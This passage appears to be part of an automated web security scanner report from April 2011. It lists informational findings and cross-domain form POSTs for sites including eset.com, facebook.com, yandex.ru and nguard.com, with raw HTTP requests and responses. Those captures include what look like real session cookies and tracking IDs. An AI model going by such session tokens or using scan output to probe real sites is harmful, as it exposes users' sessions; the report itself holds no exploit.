s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
21.12. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/store

Request 1

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 1

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
entifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.eset.com/us/business/products";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

Request 2

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Mon, 25 Apr 2011 12:59:06 GMT
X-Varnish: 1310978471
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
entifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>
21.13. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db56ea051fe32f95192852" class="connect_widget button_count" style="font-family: &quot;segoe ui&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"35053bf7",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:370179,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"jz9sm",lhsh:"c840b",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"AAmvK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v
...[SNIP]...

Request 2

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.189.65
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:58 GMT
Content-Length: 8088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db56eaa5fd462d39665703" class="connect_widget button_count" style="font-family: &quot;segoe ui&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"e9c33a83",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:370179,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"jz9sm",lhsh:"c840b",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"AAmvK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v
...[SNIP]...
22. Cross-domain POST  previous  next
There are 19 instances of this issue:

22.1. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The page contains a form which POSTs data to the domain passport.yandex.ru. The form contains the following fields:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
</a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport.yandex.ru/passport?mode=auth&amp;amp;from=direct&amp;amp;retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" method="post"onclick="return {name: 'b-domik_type_popup', title: '', register:'', regMode:''}"
>
<input name="login"/>
...[SNIP]...
22.2. http://nguard.com/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /contact.aspx

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /contact.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/about.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303735966.2.2.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303735966.2; __utmc=74935565; __utmb=74935565.2.10.1303735966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin codeOutsi
...[SNIP]...
<div>
                   
               
                <form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="post" name="conatct" id="conatct" onsubmit="return validateForm();">
               

                                                <p class="copySmallBold" >
...[SNIP]...
22.3. http://nguard.com/security/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /security/contact.aspx

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /security/contact.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303732835.1.1.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303732835.1; __utmc=74935565

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact</ti
...[SNIP]...
</ul>
   <form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="post" name="conatct" id="conatct" onsubmit="return validateSimpleForm();">
       <table width="100%" border="0" cellspacing="1" cellpadding="1" id="tblContact">
...[SNIP]...
22.4. http://odnoklassniki.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.odnoklassniki.ru. The form contains the following fields:

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&amp;st.cmd=anonymLogin&amp;tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...
22.5. http://www.customermagnetism.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5640f44c05a437bcbee56d65bbd77ffb; path=/
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 28700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Engine
...[SNIP]...
<div style="background-color: none;">
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<input type="text" name="ea" size="20" value="" style="font-family:Verdana,Geneva,Arial,Helvetica,sans-serif; font-size:11px; color: #dfdfdf; border: 1px solid #dfdfdf; background-color:
...[SNIP]...
22.6. http://www.customermagnetism.com/case-studies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /case-studies/

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:

Request

GET /case-studies/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.1.10.1303747424; __support_check=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 31470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div style="background-color: none;">
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<input type="text" name="ea" size="20" value="" style="font-family:Verdana,Geneva,Arial,Helvetica,sans-serif; font-size:11px; color: #dfdfdf; border: 1px solid #dfdfdf; background-color:
...[SNIP]...
22.7. http://www.customermagnetism.com/free-consultation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /free-consultation/

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:

Request

GET /free-consultation/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/pay-per-click-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __support_check=1; __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.4.10.1303747424

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Expires: Mon, 25 Apr 2011 16:23:43 GMT
Vary: Accept-Encoding
Pragma: no-cache
Content-Type: text/html
Content-Length: 22442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div style="background-color: none;">
<form name="ccoptin" action="http://visitor.r20.constantcontact.com/d.jsp" target="_blank" method="post" style="margin-bottom:3;">
<input type="text" name="ea" size="20" value="" style="font-family:Verdana,Geneva,Arial,Helvetica,sans-serif; font-size:11px; color: #dfdfdf; border: 1px solid #dfdfdf; background-color:
...[SNIP]...
22.8. http://www.customermagnetism.com/pay-per-click-services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customermagnetism.com
Path:   /pay-per-click-services/

Issue detail

The page contains a form which POSTs data to the domain visitor.r20.constantcontact.com. The form contains the following fields:

Request

GET /pay-per-click-services/ HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1589c4968dc8b0be45aadb39f842048f; __utmz=98075405.1303747424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __support_check=1; __utma=98075405.1782782877.1303747424.1303747424.1303747424.1; __utmc=98075405; __utmb=98075405.3.10.1303747424

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:23:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
